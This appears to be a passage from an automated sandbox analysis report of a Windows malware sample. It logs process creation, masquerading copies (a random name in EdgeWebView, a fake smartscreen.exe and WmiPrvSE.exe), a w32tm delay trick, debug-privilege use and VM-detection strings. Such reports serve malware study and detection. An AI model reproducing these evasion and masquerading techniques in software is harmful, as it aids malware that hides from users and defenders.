                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582526
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582384
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582247
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 582105
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581997
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581886
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581747
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581640
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581510
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581404
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581278
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581144
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 581000
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580891
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580766
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580641
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580528
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580417
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 580244
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579683
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579546
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579434
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579311
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579201
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 579094
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578984
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578874
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 578766
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: r6cRyCpdfS.exe, 00000000.00000002.1774235431.000000001C2D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\D
                              Source: w32tm.exe, 0000001D.00000002.1794985992.000001BE3F069000.00000004.00000020.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3042825366.000000001C404000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess token adjusted: Debug
                              Source: C:\Recovery\WmiPrvSE.exeProcess token adjusted: Debug
                              Source: C:\Recovery\WmiPrvSE.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat" Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FF9.tmp" "c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" Jump to behavior
                              Source: rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Users\user\Desktop\r6cRyCpdfS.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Users\user\Desktop\r6cRyCpdfS.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Users\user\Desktop\r6cRyCpdfS.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe VolumeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeQueries volume information: C:\Program Files (x86)\jDownloader\smartscreen.exe VolumeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeQueries volume information: C:\Program Files (x86)\jDownloader\smartscreen.exe VolumeInformation
                              Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                              Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
